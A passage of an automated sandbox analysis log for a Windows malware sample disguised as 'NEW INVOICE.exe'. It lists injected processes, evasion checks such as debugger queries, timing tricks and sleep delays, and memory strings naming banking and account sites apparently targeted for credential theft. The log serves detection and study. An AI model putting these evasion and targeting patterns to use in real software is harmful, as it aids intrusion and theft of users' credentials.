            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403380 push eax; ret 2_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB81 push ecx; ret 2_2_0041EB83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C48C push ebx; iretd 2_2_0040C492
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040658C push eax; retf 2_2_0040658D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416678 push ss; retf 2_2_00416680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330225F pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033027FA pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330283D push eax; iretd 2_2_03302858
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF225F pushad ; ret 5_2_02CF27F9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF27FA pushad ; ret 5_2_02CF27F9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF283D push eax; iretd 5_2_02CF2858
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D209AD push ecx; mov dword ptr [esp], ecx5_2_02D209B6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF1200 push edx; iretd 5_2_02CF1206
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF1368 push eax; iretd 5_2_02CF1369
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF9939 push es; iretd 5_2_02CF9940
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004440780_2_00444078
            Source: C:\Users\user\Desktop\NEW INVOICE.exeAPI/Special instruction interceptor: Address: 3F7468C
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\setupugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 3275Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeWindow / User API: threadDelayed 6697Jump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\setupugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5016Thread sleep count: 3275 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5016Thread sleep time: -6550000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5016Thread sleep count: 6697 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 5016Thread sleep time: -13394000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe TID: 6436Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe TID: 6436Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0036BE40 FindFirstFileW,FindNextFileW,FindClose,5_2_0036BE40
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: is175JI8N.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: is175JI8N.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: is175JI8N.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: is175JI8N.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: iLyDwpUmDRByL.exe, 00000006.00000002.3879924561.0000000000ECF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: is175JI8N.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: is175JI8N.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: is175JI8N.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: is175JI8N.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: is175JI8N.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: firefox.exe, 00000008.00000002.2692658182.0000018EEAFAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: is175JI8N.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: is175JI8N.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: is175JI8N.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: is175JI8N.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: is175JI8N.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: is175JI8N.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: is175JI8N.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: is175JI8N.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: is175JI8N.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004170E3 LdrLoadDll,2_2_004170E3
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_03F732E8 mov eax, dword ptr fs:[00000030h]0_2_03F732E8
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_03F74958 mov eax, dword ptr fs:[00000030h]0_2_03F74958
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_03F748F8 mov eax, dword ptr fs:[00000030h]0_2_03F748F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340634F mov eax, dword ptr fs:[00000030h]2_2_0340634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340625D mov eax, dword ptr fs:[00000030h]2_2_0340625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h]2_2_034062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
